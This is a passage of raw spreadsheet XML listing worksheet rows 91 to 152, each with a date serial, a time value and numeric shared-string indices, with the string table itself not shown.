      <c r="H91" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="92" spans="1:8">
      <c r="A92" s="7">
        <v>45833</v>
      </c>
      <c r="B92" s="12">
        <v>0.48068287037037039</v>
      </c>
      <c r="C92" t="s">
        <v>142</v>
      </c>
      <c r="D92" t="s">
        <v>29</v>
      </c>
      <c r="E92" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F92" t="s">
        <v>276</v>
      </c>
      <c r="G92" t="s">
        <v>31</v>
      </c>
      <c r="H92" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="93" spans="1:8">
      <c r="A93" s="7">
        <v>45833</v>
      </c>
      <c r="B93" s="12">
        <v>0.48085648148148147</v>
      </c>
      <c r="C93" t="s">
        <v>142</v>
      </c>
      <c r="D93" t="s">
        <v>29</v>
      </c>
      <c r="E93" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F93" t="s">
        <v>278</v>
      </c>
      <c r="G93" t="s">
        <v>31</v>
      </c>
      <c r="H93" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="94" spans="1:8">
      <c r="A94" s="7">
        <v>45833</v>
      </c>
      <c r="B94" s="12">
        <v>0.48126157407407405</v>
      </c>
      <c r="C94" t="s">
        <v>142</v>
      </c>
      <c r="D94" t="s">
        <v>29</v>
      </c>
      <c r="E94" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F94" t="s">
        <v>280</v>
      </c>
      <c r="G94" t="s">
        <v>31</v>
      </c>
      <c r="H94" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="95" spans="1:8">
      <c r="A95" s="7">
        <v>45833</v>
      </c>
      <c r="B95" s="12">
        <v>0.48143518518518519</v>
      </c>
      <c r="C95" t="s">
        <v>142</v>
      </c>
      <c r="D95" t="s">
        <v>29</v>
      </c>
      <c r="E95" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F95" t="s">
        <v>282</v>
      </c>
      <c r="G95" t="s">
        <v>31</v>
      </c>
      <c r="H95" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="96" spans="1:8">
      <c r="A96" s="7">
        <v>45833</v>
      </c>
      <c r="B96" s="12">
        <v>0.48175925925925928</v>
      </c>
      <c r="C96" t="s">
        <v>142</v>
      </c>
      <c r="D96" t="s">
        <v>29</v>
      </c>
      <c r="E96" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F96" t="s">
        <v>284</v>
      </c>
      <c r="G96" t="s">
        <v>31</v>
      </c>
      <c r="H96" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="97" spans="1:8">
      <c r="A97" s="7">
        <v>45833</v>
      </c>
      <c r="B97" s="12">
        <v>0.48208333333333331</v>
      </c>
      <c r="C97" t="s">
        <v>142</v>
      </c>
      <c r="D97" t="s">
        <v>29</v>
      </c>
      <c r="E97" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F97" t="s">
        <v>286</v>
      </c>
      <c r="G97" t="s">
        <v>31</v>
      </c>
      <c r="H97" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="98" spans="1:8">
      <c r="A98" s="7">
        <v>45833</v>
      </c>
      <c r="B98" s="12">
        <v>0.48245370370370372</v>
      </c>
      <c r="C98" t="s">
        <v>142</v>
      </c>
      <c r="D98" t="s">
        <v>29</v>
      </c>
      <c r="E98" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F98" t="s">
        <v>288</v>
      </c>
      <c r="G98" t="s">
        <v>31</v>
      </c>
      <c r="H98" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="99" spans="1:8">
      <c r="A99" s="7">
        <v>45833</v>
      </c>
      <c r="B99" s="12">
        <v>0.48249999999999998</v>
      </c>
      <c r="C99" t="s">
        <v>25</v>
      </c>
      <c r="D99" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E99" t="s">
        <v>15</v>
      </c>
      <c r="F99" t="s">
        <v>92</v>
      </c>
      <c r="G99" t="s">
        <v>54</v>
      </c>
      <c r="H99" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="100" spans="1:8">
      <c r="A100" s="7">
        <v>45833</v>
      </c>
      <c r="B100" s="12">
        <v>0.48250152777777777</v>
      </c>
      <c r="C100" t="s">
        <v>25</v>
      </c>
      <c r="D100" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E100" t="s">
        <v>15</v>
      </c>
      <c r="F100" t="s">
        <v>90</v>
      </c>
      <c r="G100" t="s">
        <v>54</v>
      </c>
      <c r="H100" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="101" spans="1:8">
      <c r="A101" s="7">
        <v>45833</v>
      </c>
      <c r="B101" s="12">
        <v>0.48271990740740739</v>
      </c>
      <c r="C101" t="s">
        <v>142</v>
      </c>
      <c r="D101" t="s">
        <v>29</v>
      </c>
      <c r="E101" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F101" t="s">
        <v>290</v>
      </c>
      <c r="G101" t="s">
        <v>31</v>
      </c>
      <c r="H101" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="102" spans="1:8">
      <c r="A102" s="7">
        <v>45833</v>
      </c>
      <c r="B102" s="12">
        <v>0.48295138888888889</v>
      </c>
      <c r="C102" t="s">
        <v>142</v>
      </c>
      <c r="D102" t="s">
        <v>29</v>
      </c>
      <c r="E102" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F102" t="s">
        <v>292</v>
      </c>
      <c r="G102" t="s">
        <v>31</v>
      </c>
      <c r="H102" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="103" spans="1:8">
      <c r="A103" s="7">
        <v>45833</v>
      </c>
      <c r="B103" s="12">
        <v>0.48299768518518521</v>
      </c>
      <c r="C103" t="s">
        <v>143</v>
      </c>
      <c r="D103" t="s">
        <v>18</v>
      </c>
      <c r="E103" t="s">
        <v>17</v>
      </c>
      <c r="F103" t="s">
        <v>162</v>
      </c>
      <c r="G103" t="s">
        <v>16</v>
      </c>
      <c r="H103" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="104" spans="1:8">
      <c r="A104" s="7">
        <v>45833</v>
      </c>
      <c r="B104" s="14">
        <v>0.48299768518518521</v>
      </c>
      <c r="C104" t="s">
        <v>143</v>
      </c>
      <c r="D104" t="s">
        <v>18</v>
      </c>
      <c r="E104" t="s">
        <v>17</v>
      </c>
      <c r="F104" t="s">
        <v>266</v>
      </c>
      <c r="G104" t="s">
        <v>16</v>
      </c>
      <c r="H104" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="105" spans="1:8">
      <c r="A105" s="7">
        <v>45833</v>
      </c>
      <c r="B105" s="12">
        <v>0.4833796296296296</v>
      </c>
      <c r="C105" t="s">
        <v>143</v>
      </c>
      <c r="D105" t="s">
        <v>18</v>
      </c>
      <c r="E105" t="s">
        <v>17</v>
      </c>
      <c r="F105" t="s">
        <v>164</v>
      </c>
      <c r="G105" t="s">
        <v>16</v>
      </c>
      <c r="H105" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="106" spans="1:8">
      <c r="A106" s="7">
        <v>45833</v>
      </c>
      <c r="B106" s="14">
        <v>0.4833796296296296</v>
      </c>
      <c r="C106" t="s">
        <v>143</v>
      </c>
      <c r="D106" t="s">
        <v>18</v>
      </c>
      <c r="E106" t="s">
        <v>17</v>
      </c>
      <c r="F106" t="s">
        <v>264</v>
      </c>
      <c r="G106" t="s">
        <v>16</v>
      </c>
      <c r="H106" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="107" spans="1:8">
      <c r="A107" s="7">
        <v>45833</v>
      </c>
      <c r="B107" s="12">
        <v>0.48376157407407405</v>
      </c>
      <c r="C107" t="s">
        <v>143</v>
      </c>
      <c r="D107" t="s">
        <v>18</v>
      </c>
      <c r="E107" t="s">
        <v>17</v>
      </c>
      <c r="F107" t="s">
        <v>166</v>
      </c>
      <c r="G107" t="s">
        <v>16</v>
      </c>
      <c r="H107" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="108" spans="1:8">
      <c r="A108" s="7">
        <v>45833</v>
      </c>
      <c r="B108" s="14">
        <v>0.48376157407407405</v>
      </c>
      <c r="C108" t="s">
        <v>143</v>
      </c>
      <c r="D108" t="s">
        <v>18</v>
      </c>
      <c r="E108" t="s">
        <v>17</v>
      </c>
      <c r="F108" t="s">
        <v>262</v>
      </c>
      <c r="G108" t="s">
        <v>16</v>
      </c>
      <c r="H108" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="109" spans="1:8">
      <c r="A109" s="7">
        <v>45833</v>
      </c>
      <c r="B109" s="12">
        <v>0.48410879629629627</v>
      </c>
      <c r="C109" t="s">
        <v>25</v>
      </c>
      <c r="D109" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E109" t="s">
        <v>15</v>
      </c>
      <c r="F109" t="s">
        <v>86</v>
      </c>
      <c r="G109" t="s">
        <v>54</v>
      </c>
      <c r="H109" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="110" spans="1:8">
      <c r="A110" s="7">
        <v>45833</v>
      </c>
      <c r="B110" s="12">
        <v>0.48410879629629627</v>
      </c>
      <c r="C110" t="s">
        <v>25</v>
      </c>
      <c r="D110" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E110" t="s">
        <v>15</v>
      </c>
      <c r="F110" t="s">
        <v>88</v>
      </c>
      <c r="G110" t="s">
        <v>54</v>
      </c>
      <c r="H110" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="111" spans="1:8">
      <c r="A111" s="7">
        <v>45833</v>
      </c>
      <c r="B111" s="12">
        <v>0.48453703703703704</v>
      </c>
      <c r="C111" t="s">
        <v>25</v>
      </c>
      <c r="D111" t="s">
        <v>29</v>
      </c>
      <c r="E111" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F111" t="s">
        <v>58</v>
      </c>
      <c r="G111" t="s">
        <v>44</v>
      </c>
      <c r="H111" s="13" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="112" spans="1:8">
      <c r="A112" s="7">
        <v>45833</v>
      </c>
      <c r="B112" s="14">
        <v>0.48453703703703704</v>
      </c>
      <c r="C112" t="s">
        <v>143</v>
      </c>
      <c r="D112" t="s">
        <v>18</v>
      </c>
      <c r="E112" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F112" t="s">
        <v>183</v>
      </c>
      <c r="G112" t="s">
        <v>44</v>
      </c>
      <c r="H112" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="113" spans="1:8">
      <c r="A113" s="7">
        <v>45833</v>
      </c>
      <c r="B113" s="14">
        <v>0.48453703703703704</v>
      </c>
      <c r="C113" t="s">
        <v>185</v>
      </c>
      <c r="D113" t="s">
        <v>21</v>
      </c>
      <c r="E113" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F113" t="s">
        <v>186</v>
      </c>
      <c r="G113" t="s">
        <v>44</v>
      </c>
      <c r="H113" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="114" spans="1:8">
      <c r="A114" s="7">
        <v>45833</v>
      </c>
      <c r="B114" s="12">
        <v>0.48489583333333336</v>
      </c>
      <c r="C114" t="s">
        <v>25</v>
      </c>
      <c r="D114" t="s">
        <v>21</v>
      </c>
      <c r="E114" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F114" s="13" t="s">
        <v>63</v>
      </c>
      <c r="G114" t="s">
        <v>16</v>
      </c>
      <c r="H114" s="13" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="115" spans="1:8">
      <c r="A115" s="7">
        <v>45833</v>
      </c>
      <c r="B115" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C115" t="s">
        <v>185</v>
      </c>
      <c r="D115" t="s">
        <v>21</v>
      </c>
      <c r="E115" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F115" t="s">
        <v>186</v>
      </c>
      <c r="G115" t="s">
        <v>44</v>
      </c>
      <c r="H115" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="116" spans="1:8">
      <c r="A116" s="7">
        <v>45833</v>
      </c>
      <c r="B116" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C116" t="s">
        <v>143</v>
      </c>
      <c r="D116" t="s">
        <v>18</v>
      </c>
      <c r="E116" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F116" t="s">
        <v>196</v>
      </c>
      <c r="G116" t="s">
        <v>44</v>
      </c>
      <c r="H116" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="117" spans="1:8">
      <c r="A117" s="7">
        <v>45833</v>
      </c>
      <c r="B117" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C117" t="s">
        <v>185</v>
      </c>
      <c r="D117" t="s">
        <v>21</v>
      </c>
      <c r="E117" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F117" t="s">
        <v>186</v>
      </c>
      <c r="G117" t="s">
        <v>44</v>
      </c>
      <c r="H117" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="118" spans="1:8">
      <c r="A118" s="7">
        <v>45833</v>
      </c>
      <c r="B118" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C118" t="s">
        <v>185</v>
      </c>
      <c r="D118" t="s">
        <v>21</v>
      </c>
      <c r="E118" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F118" t="s">
        <v>186</v>
      </c>
      <c r="G118" t="s">
        <v>44</v>
      </c>
      <c r="H118" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="119" spans="1:8">
      <c r="A119" s="7">
        <v>45833</v>
      </c>
      <c r="B119" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C119" t="s">
        <v>143</v>
      </c>
      <c r="D119" t="s">
        <v>18</v>
      </c>
      <c r="E119" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F119" t="s">
        <v>199</v>
      </c>
      <c r="G119" t="s">
        <v>44</v>
      </c>
      <c r="H119" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="120" spans="1:8">
      <c r="A120" s="7">
        <v>45833</v>
      </c>
      <c r="B120" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C120" t="s">
        <v>185</v>
      </c>
      <c r="D120" t="s">
        <v>21</v>
      </c>
      <c r="E120" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F120" t="s">
        <v>186</v>
      </c>
      <c r="G120" t="s">
        <v>44</v>
      </c>
      <c r="H120" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="121" spans="1:8">
      <c r="A121" s="7">
        <v>45833</v>
      </c>
      <c r="B121" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C121" t="s">
        <v>143</v>
      </c>
      <c r="D121" t="s">
        <v>18</v>
      </c>
      <c r="E121" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F121" t="s">
        <v>199</v>
      </c>
      <c r="G121" t="s">
        <v>44</v>
      </c>
      <c r="H121" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="122" spans="1:8">
      <c r="A122" s="7">
        <v>45833</v>
      </c>
      <c r="B122" s="14">
        <v>0.48489583333333336</v>
      </c>
      <c r="C122" t="s">
        <v>185</v>
      </c>
      <c r="D122" t="s">
        <v>21</v>
      </c>
      <c r="E122" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F122" t="s">
        <v>186</v>
      </c>
      <c r="G122" t="s">
        <v>44</v>
      </c>
      <c r="H122" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="123" spans="1:8">
      <c r="A123" s="7">
        <v>45833</v>
      </c>
      <c r="B123" s="12">
        <v>0.48489583333333336</v>
      </c>
      <c r="C123" t="s">
        <v>25</v>
      </c>
      <c r="D123" t="s">
        <v>326</v>
      </c>
      <c r="E123" s="8" t="s">
        <v>339</v>
      </c>
      <c r="F123" t="s">
        <v>340</v>
      </c>
      <c r="G123" t="s">
        <v>341</v>
      </c>
      <c r="H123" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="124" spans="1:8">
      <c r="A124" s="7">
        <v>45833</v>
      </c>
      <c r="B124" s="14">
        <v>0.4849074074074074</v>
      </c>
      <c r="C124" t="s">
        <v>143</v>
      </c>
      <c r="D124" t="s">
        <v>18</v>
      </c>
      <c r="E124" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F124" t="s">
        <v>189</v>
      </c>
      <c r="G124" t="s">
        <v>44</v>
      </c>
      <c r="H124" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="125" spans="1:8">
      <c r="A125" s="7">
        <v>45833</v>
      </c>
      <c r="B125" s="14">
        <v>0.4849074074074074</v>
      </c>
      <c r="C125" t="s">
        <v>143</v>
      </c>
      <c r="D125" t="s">
        <v>18</v>
      </c>
      <c r="E125" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F125" t="s">
        <v>199</v>
      </c>
      <c r="G125" t="s">
        <v>44</v>
      </c>
      <c r="H125" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="126" spans="1:8">
      <c r="A126" s="7">
        <v>45833</v>
      </c>
      <c r="B126" s="12">
        <v>0.48532407407407407</v>
      </c>
      <c r="C126" t="s">
        <v>143</v>
      </c>
      <c r="D126" t="s">
        <v>18</v>
      </c>
      <c r="E126" t="s">
        <v>17</v>
      </c>
      <c r="F126" t="s">
        <v>167</v>
      </c>
      <c r="G126" t="s">
        <v>16</v>
      </c>
      <c r="H126" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="127" spans="1:8">
      <c r="A127" s="7">
        <v>45833</v>
      </c>
      <c r="B127" s="14">
        <v>0.48532407407407407</v>
      </c>
      <c r="C127" t="s">
        <v>143</v>
      </c>
      <c r="D127" t="s">
        <v>18</v>
      </c>
      <c r="E127" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F127" t="s">
        <v>183</v>
      </c>
      <c r="G127" t="s">
        <v>44</v>
      </c>
      <c r="H127" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="128" spans="1:8">
      <c r="A128" s="7">
        <v>45833</v>
      </c>
      <c r="B128" s="14">
        <v>0.48532407407407407</v>
      </c>
      <c r="C128" t="s">
        <v>185</v>
      </c>
      <c r="D128" t="s">
        <v>21</v>
      </c>
      <c r="E128" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F128" t="s">
        <v>186</v>
      </c>
      <c r="G128" t="s">
        <v>44</v>
      </c>
      <c r="H128" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="129" spans="1:8">
      <c r="A129" s="7">
        <v>45833</v>
      </c>
      <c r="B129" s="14">
        <v>0.48532407407407407</v>
      </c>
      <c r="C129" t="s">
        <v>143</v>
      </c>
      <c r="D129" t="s">
        <v>18</v>
      </c>
      <c r="E129" t="s">
        <v>17</v>
      </c>
      <c r="F129" t="s">
        <v>242</v>
      </c>
      <c r="G129" t="s">
        <v>16</v>
      </c>
      <c r="H129" t="s">
        <v>243</v>
      </c>
    </row>
    <row r="130" spans="1:8">
      <c r="A130" s="7">
        <v>45833</v>
      </c>
      <c r="B130" s="14">
        <v>0.48532407407407407</v>
      </c>
      <c r="C130" t="s">
        <v>143</v>
      </c>
      <c r="D130" t="s">
        <v>18</v>
      </c>
      <c r="E130" t="s">
        <v>17</v>
      </c>
      <c r="F130" t="s">
        <v>244</v>
      </c>
      <c r="G130" t="s">
        <v>16</v>
      </c>
      <c r="H130" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="131" spans="1:8">
      <c r="A131" s="7">
        <v>45833</v>
      </c>
      <c r="B131" s="12">
        <v>0.48570601851851852</v>
      </c>
      <c r="C131" t="s">
        <v>25</v>
      </c>
      <c r="D131" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E131" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F131" s="13" t="s">
        <v>61</v>
      </c>
      <c r="G131" t="s">
        <v>16</v>
      </c>
      <c r="H131" s="13" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="132" spans="1:8">
      <c r="A132" s="7">
        <v>45833</v>
      </c>
      <c r="B132" s="12">
        <v>0.48570601851851852</v>
      </c>
      <c r="C132" t="s">
        <v>25</v>
      </c>
      <c r="D132" t="s">
        <v>83</v>
      </c>
      <c r="E132" t="s">
        <v>14</v>
      </c>
      <c r="F132" t="s">
        <v>84</v>
      </c>
      <c r="G132" t="s">
        <v>31</v>
      </c>
      <c r="H132" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="133" spans="1:8">
      <c r="A133" s="7">
        <v>45833</v>
      </c>
      <c r="B133" s="12">
        <v>0.48570601851851852</v>
      </c>
      <c r="C133" t="s">
        <v>121</v>
      </c>
      <c r="D133" t="s">
        <v>29</v>
      </c>
      <c r="E133" t="s">
        <v>14</v>
      </c>
      <c r="F133" t="s">
        <v>122</v>
      </c>
      <c r="G133" t="s">
        <v>123</v>
      </c>
      <c r="H133" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="134" spans="1:8">
      <c r="A134" s="7">
        <v>45833</v>
      </c>
      <c r="B134" s="14">
        <v>0.48571759259259262</v>
      </c>
      <c r="C134" t="s">
        <v>143</v>
      </c>
      <c r="D134" t="s">
        <v>18</v>
      </c>
      <c r="E134" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F134" t="s">
        <v>193</v>
      </c>
      <c r="G134" t="s">
        <v>44</v>
      </c>
      <c r="H134" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="135" spans="1:8">
      <c r="A135" s="7">
        <v>45833</v>
      </c>
      <c r="B135" s="14">
        <v>0.48571759259259262</v>
      </c>
      <c r="C135" t="s">
        <v>185</v>
      </c>
      <c r="D135" t="s">
        <v>21</v>
      </c>
      <c r="E135" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F135" t="s">
        <v>186</v>
      </c>
      <c r="G135" t="s">
        <v>44</v>
      </c>
      <c r="H135" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="136" spans="1:8">
      <c r="A136" s="7">
        <v>45833</v>
      </c>
      <c r="B136" s="12">
        <v>0.4861111111111111</v>
      </c>
      <c r="C136" t="s">
        <v>121</v>
      </c>
      <c r="D136" t="s">
        <v>83</v>
      </c>
      <c r="E136" t="s">
        <v>14</v>
      </c>
      <c r="F136" t="s">
        <v>122</v>
      </c>
      <c r="G136" t="s">
        <v>123</v>
      </c>
      <c r="H136" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="137" spans="1:8">
      <c r="A137" s="7">
        <v>45833</v>
      </c>
      <c r="B137" s="12">
        <v>0.4861111111111111</v>
      </c>
      <c r="C137" t="s">
        <v>147</v>
      </c>
      <c r="D137" t="s">
        <v>21</v>
      </c>
      <c r="E137" t="s">
        <v>17</v>
      </c>
      <c r="F137" t="s">
        <v>169</v>
      </c>
      <c r="G137" t="s">
        <v>16</v>
      </c>
      <c r="H137" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="138" spans="1:8">
      <c r="A138" s="7">
        <v>45833</v>
      </c>
      <c r="B138" s="14">
        <v>0.4861111111111111</v>
      </c>
      <c r="C138" t="s">
        <v>147</v>
      </c>
      <c r="D138" t="s">
        <v>21</v>
      </c>
      <c r="E138" t="s">
        <v>17</v>
      </c>
      <c r="F138" t="s">
        <v>246</v>
      </c>
      <c r="G138" t="s">
        <v>16</v>
      </c>
      <c r="H138" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="139" spans="1:8">
      <c r="A139" s="7">
        <v>45833</v>
      </c>
      <c r="B139" s="12">
        <v>0.48657407407407405</v>
      </c>
      <c r="C139" t="s">
        <v>25</v>
      </c>
      <c r="D139" t="s">
        <v>21</v>
      </c>
      <c r="E139" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F139" t="s">
        <v>64</v>
      </c>
      <c r="G139" t="s">
        <v>16</v>
      </c>
      <c r="H139" s="13" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="140" spans="1:8">
      <c r="A140" s="7">
        <v>45833</v>
      </c>
      <c r="B140" s="12">
        <v>0.48657407407407405</v>
      </c>
      <c r="C140" t="s">
        <v>147</v>
      </c>
      <c r="D140" t="s">
        <v>21</v>
      </c>
      <c r="E140" t="s">
        <v>17</v>
      </c>
      <c r="F140" t="s">
        <v>171</v>
      </c>
      <c r="G140" t="s">
        <v>16</v>
      </c>
      <c r="H140" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="141" spans="1:8">
      <c r="A141" s="7">
        <v>45833</v>
      </c>
      <c r="B141" s="14">
        <v>0.48657407407407405</v>
      </c>
      <c r="C141" t="s">
        <v>147</v>
      </c>
      <c r="D141" t="s">
        <v>21</v>
      </c>
      <c r="E141" t="s">
        <v>17</v>
      </c>
      <c r="F141" t="s">
        <v>260</v>
      </c>
      <c r="G141" t="s">
        <v>16</v>
      </c>
      <c r="H141" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="142" spans="1:8">
      <c r="A142" s="7">
        <v>45833</v>
      </c>
      <c r="B142" s="12">
        <v>0.4866435185185185</v>
      </c>
      <c r="C142" t="s">
        <v>121</v>
      </c>
      <c r="D142" t="s">
        <v>83</v>
      </c>
      <c r="E142" t="s">
        <v>14</v>
      </c>
      <c r="F142" t="s">
        <v>126</v>
      </c>
      <c r="G142" t="s">
        <v>123</v>
      </c>
      <c r="H142" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="143" spans="1:8">
      <c r="A143" s="7">
        <v>45833</v>
      </c>
      <c r="B143" s="12">
        <v>0.48702546296296295</v>
      </c>
      <c r="C143" t="s">
        <v>147</v>
      </c>
      <c r="D143" t="s">
        <v>21</v>
      </c>
      <c r="E143" t="s">
        <v>17</v>
      </c>
      <c r="F143" t="s">
        <v>173</v>
      </c>
      <c r="G143" t="s">
        <v>16</v>
      </c>
      <c r="H143" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="144" spans="1:8">
      <c r="A144" s="7">
        <v>45833</v>
      </c>
      <c r="B144" s="14">
        <v>0.48702546296296295</v>
      </c>
      <c r="C144" t="s">
        <v>147</v>
      </c>
      <c r="D144" t="s">
        <v>21</v>
      </c>
      <c r="E144" t="s">
        <v>17</v>
      </c>
      <c r="F144" t="s">
        <v>258</v>
      </c>
      <c r="G144" t="s">
        <v>16</v>
      </c>
      <c r="H144" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="145" spans="1:8">
      <c r="A145" s="7">
        <v>45833</v>
      </c>
      <c r="B145" s="12">
        <v>0.48703703703703705</v>
      </c>
      <c r="C145" t="s">
        <v>121</v>
      </c>
      <c r="D145" t="s">
        <v>83</v>
      </c>
      <c r="E145" t="s">
        <v>14</v>
      </c>
      <c r="F145" t="s">
        <v>128</v>
      </c>
      <c r="G145" t="s">
        <v>123</v>
      </c>
      <c r="H145" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="146" spans="1:8">
      <c r="A146" s="7">
        <v>45833</v>
      </c>
      <c r="B146" s="12">
        <v>0.48706018518518518</v>
      </c>
      <c r="C146" t="s">
        <v>25</v>
      </c>
      <c r="D146" t="s">
        <v>29</v>
      </c>
      <c r="E146" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F146" t="s">
        <v>294</v>
      </c>
      <c r="G146" t="s">
        <v>31</v>
      </c>
      <c r="H146" t="s">
        <v>295</v>
      </c>
    </row>
    <row r="147" spans="1:8">
      <c r="A147" s="7">
        <v>45833</v>
      </c>
      <c r="B147" s="12">
        <v>0.48712962962962963</v>
      </c>
      <c r="C147" t="s">
        <v>25</v>
      </c>
      <c r="D147" t="s">
        <v>29</v>
      </c>
      <c r="E147" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F147" t="s">
        <v>296</v>
      </c>
      <c r="G147" t="s">
        <v>31</v>
      </c>
      <c r="H147" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="148" spans="1:8">
      <c r="A148" s="7">
        <v>45833</v>
      </c>
      <c r="B148" s="12">
        <v>0.4871759259259259</v>
      </c>
      <c r="C148" t="s">
        <v>25</v>
      </c>
      <c r="D148" t="s">
        <v>29</v>
      </c>
      <c r="E148" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F148" t="s">
        <v>298</v>
      </c>
      <c r="G148" t="s">
        <v>31</v>
      </c>
      <c r="H148" t="s">
        <v>299</v>
      </c>
    </row>
    <row r="149" spans="1:8">
      <c r="A149" s="7">
        <v>45833</v>
      </c>
      <c r="B149" s="12">
        <v>0.4871875</v>
      </c>
      <c r="C149" t="s">
        <v>25</v>
      </c>
      <c r="D149" t="s">
        <v>29</v>
      </c>
      <c r="E149" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F149" t="s">
        <v>300</v>
      </c>
      <c r="G149" t="s">
        <v>31</v>
      </c>
      <c r="H149" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="150" spans="1:8">
      <c r="A150" s="7">
        <v>45833</v>
      </c>
      <c r="B150" s="12">
        <v>0.48725694444444445</v>
      </c>
      <c r="C150" t="s">
        <v>25</v>
      </c>
      <c r="D150" t="s">
        <v>29</v>
      </c>
      <c r="E150" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F150" t="s">
        <v>302</v>
      </c>
      <c r="G150" t="s">
        <v>31</v>
      </c>
      <c r="H150" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="151" spans="1:8">
      <c r="A151" s="7">
        <v>45833</v>
      </c>
      <c r="B151" s="12">
        <v>0.48730324074074072</v>
      </c>
      <c r="C151" t="s">
        <v>25</v>
      </c>
      <c r="D151" t="s">
        <v>29</v>
      </c>
      <c r="E151" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F151" t="s">
        <v>304</v>
      </c>
      <c r="G151" t="s">
        <v>31</v>
      </c>
      <c r="H151" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="152" spans="1:8">
      <c r="A152" s="7">
        <v>45833</v>
      </c>
      <c r="B152" s="12">
        <v>0.48734953703703704</v>
      </c>
      <c r="C152" t="s">
        <v>25</v>
      </c>
      <c r="D152" t="s">
        <v>29</v>
      </c>
